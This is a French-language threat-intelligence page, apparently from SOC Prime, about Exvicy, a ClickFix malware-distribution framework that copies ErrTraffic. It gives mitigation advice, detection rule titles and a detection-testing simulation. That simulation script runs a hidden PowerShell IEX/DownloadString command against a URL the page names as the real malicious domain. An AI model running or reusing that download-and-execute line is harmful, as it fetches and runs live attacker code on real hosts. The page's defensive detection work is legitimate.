SOC Prime Bias: High

24 Sep 2026 06:51 UTC

Exvicy : Un imitateur du cadre de distribution de malware ErrTraffic

Author Photo
SOC Prime Team linkedin icon Suivre
Exvicy : Un imitateur du cadre de distribution de malware ErrTraffic
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Exvicy est un cadre de distribution émergent Malware-as-a-Service (MaaS) ClickFix promu sur les forums de cybercriminalité. Il utilise l’ingénierie sociale en imitant les défis de Cloudflare Turnstile pour convaincre les utilisateurs d’exécuter des commandes PowerShell malveillantes via la boîte de dialogue Exécuter de Windows. Le cadre copie de près ErrTraffic, réutilisant de grandes portions de son code JavaScript et de ses techniques d’obfuscation.

Enquête

Les analystes TDR ont pivoté à partir d’une capture d’écran d’un panneau d’administration partagée sur le forum Exploit.IN pour découvrir une infrastructure C2 active. En analysant des serveurs de noms Cloudflare spécifiques et des modèles d’enregistrement de domaines, les chercheurs ont identifié plusieurs domaines malveillants et sites WordPress compromis. L’analyse technique a confirmé une réutilisation extensive du code ErrTraffic, y compris des fonctions JavaScript distinctives et une logique anti-analyse.

Atténuation

Les organisations devraient déployer un filtrage web robuste pour bloquer les domaines malveillants connus et les TLD suspects associés à ces campagnes. La protection des points de terminaison doit surveiller et restreindre l’exécution anormale de PowerShell, en particulier des commandes impliquant irm or iex. Les utilisateurs devraient également être formés à reconnaître les incitations d’ingénierie sociale leur demandant d’utiliser des raccourcis clavier tels que Win+R pour exécuter des commandes.

Réponse

Si une activité Exvicy est détectée, les hôtes affectés doivent être isolés immédiatement pour arrêter l’exécution de commandes supplémentaires ou la livraison de charges utiles. Les intervenants doivent examiner les journaux opérationnels de PowerShell pour identifier les commandes exécutées et les connexions réseau associées. Les adresses IP et domaines C2 connus doivent être bloqués à la périphérie, suivis d’un balayage pour d’autres ressources WordPress compromises dans l’environnement.

Flux d’attaque

Nous mettons encore à jour cette partie.

Détections

Command and Control suspect par demande DNS de domaine de premier niveau inhabituel (TLD) (via dns)

Équipe SOC Prime
23 sep 2026

Entrée RunMRU suspecte avec sémantique LOLBin (via registry_event)

Équipe SOC Prime
23 sep 2026

IOCs (SourceIP) à détecter : Exvicy : Un imitateur du cadre de distribution de logiciels malveillants ErrTraffic

Règles AI SOC Prime
23 sep 2026

IOCs (DestinationIP) à détecter : Exvicy : Un imitateur du cadre de distribution de logiciels malveillants ErrTraffic

Règles AI SOC Prime
23 sep 2026

Détection de l’exécution de commande PowerShell malveillante pour le logiciel malveillant Exvicy [Windows Powershell]

Règles AI SOC Prime
23 sep 2026

Execution de commandes du cadre Exvicy via le raccourci Win + R [Création de processus Windows]

Règles AI SOC Prime
23 sep 2026

Exécution de Simulation

  • Narration et commanditaires de l’attaque : Un adversaire livre un raccourci ou document malveillant à un utilisateur via le phishing. Lors de l’exécution (T1204.002), l’utilisateur déclenche à son insu un processus PowerShell (T1059.001). L’objectif de l’attaquant est de prendre pied en téléchargeant une charge utile secondaire. Pour imiter le cadre Exvicy, la ligne de commande est conçue pour inclure le domaine malveillant spécifique connu recaptcha-check.com/8E9curHNH8UfAMLz pour télécharger l’agent malveillant.

  • Script de Test de Régression :

    # Script de simulation pour déclencher la règle de détection Exvicy.
    # Cela imite les modèles de ligne de commande identifiés dans la règle Sigma.
    
    $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz"
    $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`""
    
    Write-Host "[+] Démarrage de la Simulation : Exécution de la commande pour déclencher la détection..."
    Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`""
    Write-Host "[+] Commande de simulation envoyée. Vérifiez les alertes SIEM."
  • Commandes de Nettoyage :

    # Nettoyage : Aucun fichier permanent n'est créé par cette simulation spécifique, 
    # mais nous nous assurons qu'aucun processus PowerShell en suspens ne soit en cours d'exécution.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue
    Write-Host "[+] Nettoyage terminé."